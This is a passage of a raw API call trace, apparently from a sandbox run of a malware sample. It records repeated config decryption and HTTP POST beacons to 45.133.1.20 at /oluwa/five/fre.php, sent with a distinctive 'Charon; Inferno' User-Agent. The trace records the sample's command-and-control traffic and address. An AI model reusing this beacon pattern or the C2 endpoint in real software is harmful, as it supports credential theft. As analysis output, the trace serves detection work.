pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0282.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.907] CryptDestroyKey (hKey=0x6ad020) returned 1 [0282.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.908] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0282.908] GetProcessHeap () returned 0x6a0000 [0282.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.909] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0282.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.910] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0282.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.914] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0282.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.916] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0282.916] GetProcessHeap () returned 0x6a0000 [0282.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0282.916] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0282.916] GetProcessHeap () returned 0x6a0000 [0282.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0282.916] socket (af=2, type=1, protocol=6) returned 0xa50 [0282.916] connect (s=0xa50, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0282.948] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0282.948] GetProcessHeap () returned 0x6a0000 [0282.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0282.948] GetProcessHeap () returned 0x6a0000 [0282.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0282.949] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.950] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.950] GetProcessHeap () returned 0x6a0000 [0282.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0282.950] GetProcessHeap () returned 0x6a0000 [0282.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0282.951] GetProcessHeap () returned 0x6a0000 [0282.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0282.951] GetProcessHeap () returned 0x6a0000 [0282.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0282.970] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.971] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.971] GetProcessHeap () returned 0x6a0000 [0282.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0282.971] GetProcessHeap () returned 0x6a0000 [0282.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0282.972] send (s=0xa50, buf=0x6bd460*, len=242, flags=0) returned 242 [0282.973] send (s=0xa50, buf=0x6bb998*, len=159, flags=0) returned 159 [0282.973] GetProcessHeap () returned 0x6a0000 [0282.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0282.973] recv (in: s=0xa50, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0283.054] GetProcessHeap () returned 0x6a0000 [0283.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0283.056] GetProcessHeap () returned 0x6a0000 [0283.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0283.057] GetProcessHeap () returned 0x6a0000 [0283.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0283.058] GetProcessHeap () returned 0x6a0000 [0283.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0283.059] closesocket (s=0xa50) returned 0 [0283.060] GetProcessHeap () returned 0x6a0000 [0283.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0283.060] GetProcessHeap () returned 0x6a0000 [0283.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.060] GetProcessHeap () returned 0x6a0000 [0283.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0283.061] GetProcessHeap () returned 0x6a0000 [0283.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0283.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17ec) returned 0xa50 [0283.064] Sleep (dwMilliseconds=0xea60) [0283.065] GetProcessHeap () returned 0x6a0000 [0283.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0283.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.067] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0283.169] GetProcessHeap () returned 0x6a0000 [0283.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0283.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.171] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0283.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.172] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.173] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.173] GetProcessHeap () returned 0x6a0000 [0283.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0283.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.207] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0283.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.212] CryptDestroyKey (hKey=0x6ad020) returned 1 [0283.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.213] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0283.213] GetProcessHeap () returned 0x6a0000 [0283.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.215] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.216] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.217] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.220] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.220] GetProcessHeap () returned 0x6a0000 [0283.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0283.221] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.221] GetProcessHeap () returned 0x6a0000 [0283.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0283.222] GetProcessHeap () returned 0x6a0000 [0283.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.222] GetProcessHeap () returned 0x6a0000 [0283.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0283.223] GetProcessHeap () returned 0x6a0000 [0283.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0283.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.225] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0283.245] GetProcessHeap () returned 0x6a0000 [0283.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0283.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.248] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0283.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.249] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.251] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.251] GetProcessHeap () returned 0x6a0000 [0283.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0283.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.255] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0283.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.257] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0283.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.258] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0283.258] GetProcessHeap () returned 0x6a0000 [0283.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0283.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.261] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0283.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0283.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.267] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0283.267] GetProcessHeap () returned 0x6a0000 [0283.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0283.267] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0283.267] GetProcessHeap () returned 0x6a0000 [0283.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0283.267] socket (af=2, type=1, protocol=6) returned 0xa54 [0283.268] connect (s=0xa54, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0283.291] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0283.291] GetProcessHeap () returned 0x6a0000 [0283.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0283.291] GetProcessHeap () returned 0x6a0000 [0283.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0283.292] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.293] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.293] GetProcessHeap () returned 0x6a0000 [0283.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba530 [0283.293] GetProcessHeap () returned 0x6a0000 [0283.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.294] GetProcessHeap () returned 0x6a0000 [0283.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0283.294] GetProcessHeap () returned 0x6a0000 [0283.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0283.295] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.298] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.298] GetProcessHeap () returned 0x6a0000 [0283.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0283.298] GetProcessHeap () returned 0x6a0000 [0283.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.299] send (s=0xa54, buf=0x6bd460*, len=242, flags=0) returned 242 [0283.300] send (s=0xa54, buf=0x6bb998*, len=159, flags=0) returned 159 [0283.300] GetProcessHeap () returned 0x6a0000 [0283.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0283.300] recv (in: s=0xa54, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0283.379] GetProcessHeap () returned 0x6a0000 [0283.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0283.380] GetProcessHeap () returned 0x6a0000 [0283.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0283.380] GetProcessHeap () returned 0x6a0000 [0283.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba530 | out: hHeap=0x6a0000) returned 1 [0283.381] GetProcessHeap () returned 0x6a0000 [0283.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0283.381] closesocket (s=0xa54) returned 0 [0283.382] GetProcessHeap () returned 0x6a0000 [0283.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0283.382] GetProcessHeap () returned 0x6a0000 [0283.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.383] GetProcessHeap () returned 0x6a0000 [0283.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0283.386] GetProcessHeap () returned 0x6a0000 [0283.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0283.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17f0) returned 0xa54 [0283.389] Sleep (dwMilliseconds=0xea60) [0283.390] GetProcessHeap () returned 0x6a0000 [0283.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0283.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.391] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0283.428] GetProcessHeap () returned 0x6a0000 [0283.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0283.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.431] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0283.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.434] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.435] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.435] GetProcessHeap () returned 0x6a0000 [0283.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0283.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.437] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0283.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.438] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0283.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.439] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0283.439] GetProcessHeap () returned 0x6a0000 [0283.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.440] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.441] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.442] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.443] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.443] GetProcessHeap () returned 0x6a0000 [0283.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0283.443] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.444] GetProcessHeap () returned 0x6a0000 [0283.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0283.444] GetProcessHeap () returned 0x6a0000 [0283.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.444] GetProcessHeap () returned 0x6a0000 [0283.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0283.445] GetProcessHeap () returned 0x6a0000 [0283.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0283.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0283.492] GetProcessHeap () returned 0x6a0000 [0283.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0283.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.494] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0283.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.495] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.496] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.497] GetProcessHeap () returned 0x6a0000 [0283.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0283.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.498] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0283.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.499] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0283.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.500] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0283.500] GetProcessHeap () returned 0x6a0000 [0283.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.503] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0283.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.505] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0283.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 